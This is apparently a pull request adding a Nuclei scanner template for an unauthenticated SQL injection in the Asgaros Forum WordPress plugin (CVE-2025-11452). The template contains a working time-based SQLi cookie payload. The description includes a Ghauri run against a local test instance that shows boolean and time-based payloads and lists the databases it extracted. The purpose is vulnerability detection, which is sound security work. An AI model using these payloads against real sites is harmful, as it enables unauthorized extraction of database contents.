### PR TITLE
Add CVE-2025-11452.yaml file

### DIFF
--- a/http/cves/2025/CVE-2025-11452.yaml
+++ b/http/cves/2025/CVE-2025-11452.yaml
@@ -34,7 +34,7 @@ http:
 
     matchers-condition: and
     matchers:
-		  # Confirm the current page is rendered as an Asgaros Forum page.
+      # Confirm the current page is rendered as an Asgaros Forum page.
       - type: regex
         part: body
         regex:

--- a/http/cves/2025/CVE-2025-11452.yaml
+++ b/http/cves/2025/CVE-2025-11452.yaml
@@ -1,0 +1,60 @@
+id: CVE-2025-11452
+
+info:
+  name: Asgaros Forum < 3.2.0 - Unauthenticated SQL Injection
+  author: Pauullamm
+  severity: high
+  description: |
+    Asgaros Forum for WordPress versions prior to 3.2.0 is vulnerable to
+    unauthenticated SQL injection through the asgarosforum_unread_exclude
+    cookie. The cookie is parsed as JSON and attacker-controlled object keys
+    are incorporated into an SQL query without sufficient sanitization.
+  reference:
+    - https://wpscan.com/vulnerability/e89f1f31-dc70-4ea5-b389-81c8be5b10c6/
+    - https://www.redpacketsecurity.com/cve-alert-cve-2025-11452-asgaros-asgaros-forum/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11452
+  classification:
+    cve-id: CVE-2025-11452
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: asgaros
+    product: asgaros-forum
+    framework: wordpress
+  tags: cve,cve2025,wordpress,wp-plugin,asgaros-forum,sqli,unauth
+
+http:
+  - raw:
+      - |
+        GET {{BaseURL}} HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: asgarosforum_unread_exclude={"(SELECT(0)FROM(SELECT(SLEEP(7)))a)":1}
+        Connection: close
+
+    matchers-condition: and
+    matchers:
+		  # Confirm the current page is rendered as an Asgaros Forum page.
+      - type: regex
+        part: body
+        regex:
+          - '<body\b[^>]*\bclass=["''][^"'']*\basgaros-forum\b[^"'']*["'']'
+
+      # Confirm the installed plugin version is vulnerable.
+      - type: dsl
+        dsl:
+          - 'compare_versions(plugin_version, "<3.2.0")'
+
+      # Confirm the SQL injection is actually executable.
+      - type: dsl
+        dsl:
+          - 'duration >= 6'
+
+    extractors:
+      # Asgaros assets are versioned with ?ver=<plugin-version>.
+      - type: regex
+        name: plugin_version
+        part: body
+        group: 1
+        regex:
+          - '(?:wp-content/plugins/asgaros-forum/[^"\x27?]+\.(?:css|js))\?ver=([0-9]+(?:\.[0-9]+)+)'


### PR DESCRIPTION
### PR Information

Hi! just added the template for CVE-2025-11452

Description:
The Asgaros Forum plugin for WordPress is vulnerable to SQL Injection via the '$_COOKIE['asgarosforum_unread_exclude']' cookie in all versions up to, and including, 3.1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/asgaros-forum/asgaros-forum-310-unauthenticated-sql-injection

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

Here are the results from my own local wordpress instance. I've noticed that the PoC works where the forum is actually rendered i.e. /forum/ in this case works, but not /. The template checks for the presence of the forum through the <body> html element and 'asgaros-forum' css tag.

Nuclei test:
```bash
./nuclei -u 127.0.0.1:8080/forum/ -t ./cve.yaml -v

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.11.0

		projectdiscovery.io

[VER] Started metrics server at localhost:9092
[VER] Saved 13304 templates to metadata cache
[INF] Current nuclei version: v3.11.0 (outdated)
[INF] Current nuclei-templates version: v10.4.7 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 122
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[VER] [cve-2025-11452] Sent HTTP request to http://127.0.0.1:8080/forum/
[cve-2025-11452:plugin_version] [http] [high] http://127.0.0.1:8080/forum/ ["3.1.0"]
[INF] Scan completed in 7.239608083s. 1 matches found.
[INF] HTTP connections: 1 total, 1 new, 0 reused (0.0%)
[INF] HTTP connections [127.0.0.1:8080]: 1 total, 1 new, 0 reused (0.0%)
```

Ghauri test:
```bash
ghauri -u 'http://127.0.0.1:8080/forum/' --cookie='wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; asgarosforum_unique_id=6a807f0d328af; asgarosforum_unread_cleared=1000-01-01%2000%3A00%3A00; asgarosforum_unread_exclude=%7B%22*%22%3A1%7D' --dbms MySQL --dbs     


  ________.__                        .__  {1.4.3}
 /  _____/|  |__ _____   __ _________|__|
/   \  ___|  |  \\__  \ |  |  \_  __ \  |
\    \_\  \   Y  \/ __ \|  |  /|  | \/  |
 \______  /___|  (____  /____/ |__|  |__|
        \/     \/     \/         https://github.com/r0oth3x49
                                 An advanced SQL injection detection & exploitation tool.
  


[*] starting @ 16:20:54 /2026-08-15/

custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] 

[16:20:55] [INFO] testing connection to the target URL
Ghauri resumed the following injection point(s) from stored session:
---
Parameter: asgarosforum_unread_exclude (COOKIE)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace
    Payload: asgarosforum_unread_exclude={"(SELECT (CASE WHEN (06965=6965) THEN 03586 ELSE 3*(SELECT 2 UNION ALL SELECT 1) END))":1}

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: asgarosforum_unread_exclude={"(SELECT(0)FROM(SELECT(SLEEP(7)))a)":1}
---
[16:20:56] [INFO] testing MySQL
[16:20:56] [INFO] confirming MySQL
[16:20:56] [INFO] the back-end DBMS is MySQL
[16:20:56] [INFO] fetching database names
[16:20:56] [INFO] fetching number of databases
do you want to URL encode cookie values (implementation specific)? [Y/n] 

[16:21:02] [INFO] retrieved: 2 
[16:21:43] [INFO] retrieved: information_schema 
[16:22:04] [INFO] retrieved: wordpress 
available databases [2]:
[*] information_schema
[*] wordpress
```
### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
